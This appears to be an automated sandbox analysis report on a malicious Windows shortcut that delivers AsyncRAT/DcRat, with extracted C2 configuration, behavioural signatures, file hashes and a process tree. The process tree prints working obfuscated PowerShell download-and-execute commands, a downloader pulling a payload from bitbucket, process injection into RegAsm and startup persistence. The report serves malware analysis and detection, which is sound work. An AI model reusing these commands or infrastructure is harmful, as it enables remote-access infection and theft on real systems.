Analysis
-
max time kernel
147s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11/11/2024, 15:37
Static task
static1
Behavioral task
behavioral1
Sample
d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
Resource
win7-20240903-en
General
-
Target
d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
-
Size
2KB
-
MD5
5358d8d8fe485972eb8115f7daf16080
-
SHA1
245e93bc84a9e8635732a8b9a9ed2e906a09f1c0
-
SHA256
d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa
-
SHA512
5808ab33e81962bc5252022357a2906651a84ad1cdcf007e5b21d0eb9ff1f08c9fde44d186a18c64e06e8c3ccb6b751de000e1877922dccb8cf7e6cc7996bf74
Malware Config
Extracted
asyncrat
1.0.7
Default
103.125.189.155:8848
DcRatMutex_adxzvxv
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 5 IoCs
flow pid Process 6 2140 powershell.exe 20 4588 powershell.exe 22 4588 powershell.exe 28 4588 powershell.exe 30 5028 powershell.exe -
pid Process 4840 powershell.exe 4588 powershell.exe 1360 powershell.exe 2140 powershell.exe 5028 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INTEL02.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INTEL02.bat cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 bitbucket.org 20 bitbucket.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4588 set thread context of 224 4588 powershell.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3296 WINWORD.EXE 3296 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1360 powershell.exe 1360 powershell.exe 2140 powershell.exe 2140 powershell.exe 4840 powershell.exe 4840 powershell.exe 4588 powershell.exe 4588 powershell.exe 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 2140 powershell.exe Token: SeIncreaseQuotaPrivilege 100 WMIC.exe Token: SeSecurityPrivilege 100 WMIC.exe Token: SeTakeOwnershipPrivilege 100 WMIC.exe Token: SeLoadDriverPrivilege 100 WMIC.exe Token: SeSystemProfilePrivilege 100 WMIC.exe Token: SeSystemtimePrivilege 100 WMIC.exe Token: SeProfSingleProcessPrivilege 100 WMIC.exe Token: SeIncBasePriorityPrivilege 100 WMIC.exe Token: SeCreatePagefilePrivilege 100 WMIC.exe Token: SeBackupPrivilege 100 WMIC.exe Token: SeRestorePrivilege 100 WMIC.exe Token: SeShutdownPrivilege 100 WMIC.exe Token: SeDebugPrivilege 100 WMIC.exe Token: SeSystemEnvironmentPrivilege 100 WMIC.exe Token: SeRemoteShutdownPrivilege 100 WMIC.exe Token: SeUndockPrivilege 100 WMIC.exe Token: SeManageVolumePrivilege 100 WMIC.exe Token: 33 100 WMIC.exe Token: 34 100 WMIC.exe Token: 35 100 WMIC.exe Token: 36 100 WMIC.exe Token: SeIncreaseQuotaPrivilege 100 WMIC.exe Token: SeSecurityPrivilege 100 WMIC.exe Token: SeTakeOwnershipPrivilege 100 WMIC.exe Token: SeLoadDriverPrivilege 100 WMIC.exe Token: SeSystemProfilePrivilege 100 WMIC.exe Token: SeSystemtimePrivilege 100 WMIC.exe Token: SeProfSingleProcessPrivilege 100 WMIC.exe Token: SeIncBasePriorityPrivilege 100 WMIC.exe Token: SeCreatePagefilePrivilege 100 WMIC.exe Token: SeBackupPrivilege 100 WMIC.exe Token: SeRestorePrivilege 100 WMIC.exe Token: SeShutdownPrivilege 100 WMIC.exe Token: SeDebugPrivilege 100 WMIC.exe Token: SeSystemEnvironmentPrivilege 100 WMIC.exe Token: SeRemoteShutdownPrivilege 100 WMIC.exe Token: SeUndockPrivilege 100 WMIC.exe Token: SeManageVolumePrivilege 100 WMIC.exe Token: 33 100 WMIC.exe Token: 34 100 WMIC.exe Token: 35 100 WMIC.exe Token: 36 100 WMIC.exe Token: SeDebugPrivilege 4840 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 224 RegAsm.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3296 WINWORD.EXE 3296 WINWORD.EXE 3296 WINWORD.EXE 3296 WINWORD.EXE 3296 WINWORD.EXE 3296 WINWORD.EXE 3296 WINWORD.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 5112 wrote to memory of 1360 5112 cmd.exe 84 PID 5112 wrote to memory of 1360 5112 cmd.exe 84 PID 1360 wrote to memory of 1340 1360 powershell.exe 85 PID 1360 wrote to memory of 1340 1360 powershell.exe 85 PID 1340 wrote to memory of 2140 1340 cmd.exe 86 PID 1340 wrote to memory of 2140 1340 cmd.exe 86 PID 2140 wrote to memory of 1624 2140 powershell.exe 90 PID 2140 wrote to memory of 1624 2140 powershell.exe 90 PID 1624 wrote to memory of 100 1624 cmd.exe 91 PID 1624 wrote to memory of 100 1624 cmd.exe 91 PID 1624 wrote to memory of 1696 1624 cmd.exe 92 PID 1624 wrote to memory of 1696 1624 cmd.exe 92 PID 1624 wrote to memory of 4840 1624 cmd.exe 94 PID 1624 wrote to memory of 4840 1624 cmd.exe 94 PID 4840 wrote to memory of 4588 4840 powershell.exe 95 PID 4840 wrote to memory of 4588 4840 powershell.exe 95 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 4588 wrote to memory of 224 4588 powershell.exe 106 PID 1624 wrote to memory of 5028 1624 cmd.exe 107 PID 1624 wrote to memory of 5028 1624 cmd.exe 107 PID 5028 wrote to memory of 3296 5028 powershell.exe 109 PID 5028 wrote to memory of 3296 5028 powershell.exe 109
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==3⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\INTEL02.bat""5⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name6⤵
- Suspicious use of AdjustPrivilegeToken
PID:100
-
-
C:\Windows\system32\find.exefind "QEMU"6⤵PID:1696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#Z#By#DM#N#B3#Gc#Z#Bz#GY#ZwBz#C8#ZgBz#GQ#ZgBz#GQ#cw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#d#Bl#HM#d#Bf#Gk#bQBn#C4#agBw#Gc#Pw#x#DQ#N##x#Dc#Jw#s#C##JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GQ#YQBy#Gs#bQBh#G4#YQBn#GU#cg#v#GQ#YQBy#Gs#bw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#d#Bl#HM#d#Bf#Gk#bQBn#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#Go#YQBm#GI#c#BT#Gs#Lw#y#DY#Lg#y#D##MQ#u#D##Mg#u#DM#M##x#C8#Lw#6#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe $OWjuxD"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hdr34wgdsfgs/fsdfsds/downloads/test_img.jpg?14417', 'https://bitbucket.org/darkmanager/darko/downloads/test_img.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.jafbpSk/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""7⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3296
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD57d4fd0768b8cba2af39bf88ba789e27a
SHA131315e8bc69d8ff9d3764071b0c9def830dabf58
SHA256bac0b67b6a6ffaea1aa1cd97802e9e7f45f6ab68f60dc4ebd71f943848530838
SHA512101971fafe90fa9e703bb4d62208f984fe3162044bf30b2ed16f5cd9dc16d2e9a9770fccd37cfee3796b4f222035418dc0ab79df1a99faeb385889341972c754
-
Filesize
266B
MD586493b936f7da8c56ca1aa58bb7a7e9a
SHA1fc7cae515fde493541be88881c285d712db7212c
SHA2564d6282ece4e6047126c782e717ddd21adbb311412b9ac8ce65c4e3650871a47d
SHA51258b37f2dbf86e9754df24df81b37ab4336459f47b24cb39457e7c0097e9c3e9ded43cdb3d0517944f5d7022750f1fe5d29e44054982c5dbedadf1a8e8c8cf859
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize684B
MD5f503b3b384c5bd135f5a190d720f198b
SHA13056a2c90ac0acb51e030e355d1a6cb6557ea766
SHA2565e1938be5ff643525fb28ae0e8118d88dc34fe60745447fa1af2575dfb2e449f
SHA51229fbd1260a67c2e3b36e3c9d7608ec79ca5caa759688234a23f2c9ebb88bfa8e81f7984f82abd806c360097be16764faf10bd6f8c2d8242ba3cdd426aa48c0c3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD59055dde56adc3490f91b8446684aa69a
SHA18df9f63b4290c52bdda40ad376b2910b4b85fb29
SHA25653033b1796646896f00b287d700ba51170ad2d4456527975ffd12eb39603a1fc
SHA512ecb76ab8fbfaacf81e39e9ab352f9a92dbf5d94d879609a5c40407410cb6fd7ac0326f77f2938047f9e7bfe5a75acdb270e3d78956c353ec2b0b7a0dab017025
-
Filesize
12KB
MD5ff3620557b65e6e8dd8816643d785c5a
SHA1d5021480b7cac2066462829c53dc18615642c579
SHA25685225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9
SHA512c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34